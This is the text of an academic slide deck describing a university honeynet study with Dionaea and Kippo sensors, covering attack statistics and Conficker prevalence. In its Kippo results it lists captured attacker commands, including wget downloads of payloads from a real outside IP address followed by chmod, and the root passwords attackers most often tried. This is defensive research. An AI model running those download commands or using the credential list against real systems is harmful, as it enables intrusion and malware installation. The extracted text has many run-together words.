View
6
Download
0
Category
Preview:
Citation preview
Study of Internet Threats and Attacks Methods Using Honeypots and
Honeynets
Tomas Sochor & Matej ZuzcakUniversity of Ostrava
Department of Informatics and Computers
PresentationContents1. Introduction.2. Honeypot and honeynet classification.3. Research methods.4. Sensors used for the study.5. Honeynet topology.6. Results:
– Linux SSH shell emulation (Kippo),– Windows emulation (Dionaea).
7. Comparison of sensor attractiveness.8. Conclusions.
Honeypot and Honeynet Classification
− Honeypot (L. Spitzner, 2003)Safety feature - "lure" for attackers:
– lures for attacks,– captured attacks can be analyzed in detail.
– Basic classification based on activity:– passive (server honeypots),− active (client honeypots).
− Basic classification according to the level of their interaction:− low/(medium) interaction honeypots,− high-interaction honeypots.
Honeypot and Honeynet Classification• Accordingproductionview:(importantclassification)– Productive honeypots
• Shadow honeypots
– Research honeypots
HoneypotPurpose• Obtaining information about:
– Most widespread threats or attacks in our area. – New threats and attacks.
• Why is it important?– Improve detection and defence.
• „Keep up with the attackers...“– Comparing attractivity of different networks for
attackers, actual trends• detection of potential new threats
Honeynet Classification
• Honeynet = (logical) network of several honeypots– either connected to a single physical network– or to multiple networks interconnected using the
Internet).
Honeypot Projects - Current State− Honeypot results are seldom published.− Published data:
− few details,− often outdated.
− Further more detailed analysis is not possible.− Numerous closed community honeypots
− data can be shared only among members.− National and European institutions
− CERT and CSIRT teams, ENISA:− Researchandretrievingdatarunbyprivatebodies,
− mostlyinnon-publicmode(e.g.armedforces).− Onlyfewprojectsarepubliclyavailable
− mostofthemnotfocusedprimarilytohoneypots,− Someprojectspublicelementarystatisticaloutputs,
example:denyhosts,Dshield.org
Study Research Methods− Low-interaction honeynet:
− Windows honeypot sensor – Dionaea:− emulation of specific protocols and vulnerabilities,− primary goal is to capture and analyze binary files
(malware).− Linux honeypot sensor – Kippo:
− emulation of SSH shell (network port 22),− primary goal is monitor the activities of the attacker,
who is remotely connected to the system.
Distribution and Implementation of Sensors
− Sensors with low-interaction:− Dionaea: OSU (ČR), VPS Prague (ČR), Kysucké Nové mesto
(SR),− Kippo: VPS Prague (ČR).
− Modifications Dionaea and Kippo implementations:− Malware identification propagated into central database
− Evaluating data.− Analysis of the data.− Comparison of results among sensors.− Sensors’ attractiveness in academic networks is low
− almost insufficient.
Dionaeahoneypotsensor– OSU,CESNETNumberofallconnectionsinthedirectiontohoneypotduringoneday:
Downloadedfilesduringoneday:
Dionaeahoneypotsensor – VPSPrahaNumberofallconnectionsinthedirectiontohoneypotduringoneday:
Downloadedfilesduringoneday:
Dionaeahoneypotsensor – SR,SANETNumberofallconnectionsinthedirectiontohoneypotduringoneday:
Downloadedfilesduringoneday:
2125,11=x
789,62=x
241,90=x
28635,4869064,48
==sx
0
1000
2000
3000
4000
5000
6000
7000
8000
1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014
0
5000
10000
15000
20000
25000
30000
35000
1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014
020000400006000080000100000120000140000160000180000
1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014
0,15=x
Dionaea – Windows attacks analysis
− Number of unique samples (according MD5): 1440− Number of unknown samples (acc. Virustotal.com): 16− Conficker network worm
− the most frequently spread threat captured −99,99933%from all malware−RPC execution via buffer overflow
−originated Nov. 2008!−lots of new polymorphic variants
Operation system
Number of connections
Windows 9 123 795
Neznámy 114 928
Linux 4 736
SunOS 454
Local port Number of accepted connections
445 9 141 64080 26 6041433 15 6453306 11 55221 7300 500000 1000000 1500000
Win32/Conficker.AA
Win32/Conficker.AE
Win32/Conficker.AL
Win32/Conficker.X
Kippo – Linux attack statisticsNumber of attemptstoconnect to SSH shell. During one day:
Number of successful attemptstoconnect to SSH shell (login). During one day:
280.636603.793
==sx
877.4792.10
==sx
Kippo – Linux attacks analysisThe10topIPaddresseswiththehighestnumberofconnections.
Activityofindividualcountriesaccordingnumberofconnections.Total number of attempts to connect : 42 061Number of unique attacker IP addresses: 427
Kippo – Linux attacks analysis
Name Password Countroot admin 653root 123456 306root Password 119root !QAZ@WSX 112root - 96admin password 91root Abc123 89root Password123 89root p@ssw0rd 86admin passw0rd 85
Themostcommonlogindata
ThemostcommonactivitiesinemulatedsystemSSH shell inputpwdlschmod 0775 .TSmls -lchmod 0775 .Mm2unameuname -aexitwget http://216.99.158.70:8090/.TSmwget http://216.99.158.70:8090/.Mm2
Low-interaction honeynet - conclusions
− Difficult comparison with other studies.− Results comparison:
− in rough accordance with CZ-NIC, CERT-PL.− Indifferent approach to installing security updates.− Missing elementary safety features and habits.− Obtaining a detailed statistical overview of current trends in
security threats.− Potential detection of new threats.− Obtained data can be used for the purpose of updating and
disseminating blacklist firewalls / IPS systems.
Honeypots and IPv6 protocol– IPv6 honeypots connected to the Internet are still
ineffective:− The huge range of IPv6 addresses, scan is pointless.− The best promoting example:
− domains in form ipv6.xxx.xx.− Honeypot tested in experimental IPv6 LAN
− could be useful for “dormant” IPv6 network.− Currently IPv6 protocol is supported directly only Dionaea
honeypot implementation.− IPv6 support in Kippo is probably possible with external patch.
Conclusion and further research− Honeypots and honeynets are needed:
− Results indicate continuous occurrence earlier attacks.− Provide an overview of current trends, the possibility of detecting
new attacks and other research with of the obtained data.− Future research:
− In present we focus mainly to high-interaction honeypots.− We are planning research with SCADA honeypots.− We are expanding our research network of low-interaction
honeypots (low-interaction honeynet) for more relevant data too.
− We want do deeper research on local networks too and do research with client honeypots in the future.
Acknowledgments• Forprovidedhardwareandconnection:
– UniversityofOstrava• InformationTechnologyCentre
– Spojena skola vKysuckomNovomMeste,SK• Forexpertconsulting:
– TheHoneynet Project,CzechChapter– CZ-NIC
Recommended